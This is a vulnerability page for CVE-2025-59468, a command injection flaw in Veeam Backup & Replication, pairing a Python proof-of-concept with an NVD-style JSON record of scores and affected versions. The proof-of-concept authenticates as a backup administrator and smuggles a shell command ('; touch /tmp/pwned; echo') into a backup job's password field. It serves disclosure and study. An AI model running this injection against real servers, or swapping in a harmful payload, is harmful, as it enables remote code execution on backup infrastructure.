CVE-2025-59468

# CVE-2025-59468 PoC Concept (Educational Purpose Only) # This demonstrates the vulnerability concept - actual exploitation requires authorization import requests import json TARGET = "https://veeam-server.local:9443" LOGIN_ENDPOINT = f"{TARGET}/api/v1.0/login" BACKUP_JOB_ENDPOINT = f"{TARGET}/api/v1.0/backupJobs" # Step 1: Authenticate as Backup Administrator credentials = { "username": "backup_admin", "password": "legitimate_password" } session = requests.Session() auth_response = session.post(LOGIN_ENDPOINT, json=credentials) if auth_response.status_code != 200: print("Authentication failed") exit(1) # Step 2: Create malicious backup job with injected password # The vulnerability allows command injection in the password parameter malicious_password = "; touch /tmp/pwned; echo" malicious_job_config = { "name": "Malicious Backup Job", "guestProcessing": { "credentials": { "username": "target_user", "password": malicious_password # Command injection point } }, "targetRepository": "Default Backup Repository" } # Step 3: Submit the malicious job configuration response = session.post(BACKUP_JOB_ENDPOINT, json=malicious_job_config) print(f"Response Status: {response.status_code}") print(f"If vulnerable, command would execute as postgres user")

{"cve": {"id": "CVE-2025-59468", "sourceIdentifier": "[email protected]", "published": "2026-01-08T17:15:48.067", "lastModified": "2026-01-14T20:58:35.693", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "This vulnerability allows a Backup Administrator to perform remote code execution (RCE) as the postgres user by sending a\r\nmalicious password parameter."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:veeam:veeam_backup_\\&_replication:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.0.0.4967", "versionEndExcluding": "13.0.1.1071", "matchCriteriaId": "ABE23802-A559-4743-A88B-7716C8645697"}]}]}], "references": [{"url": "https://www.veeam.com/kb4792", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}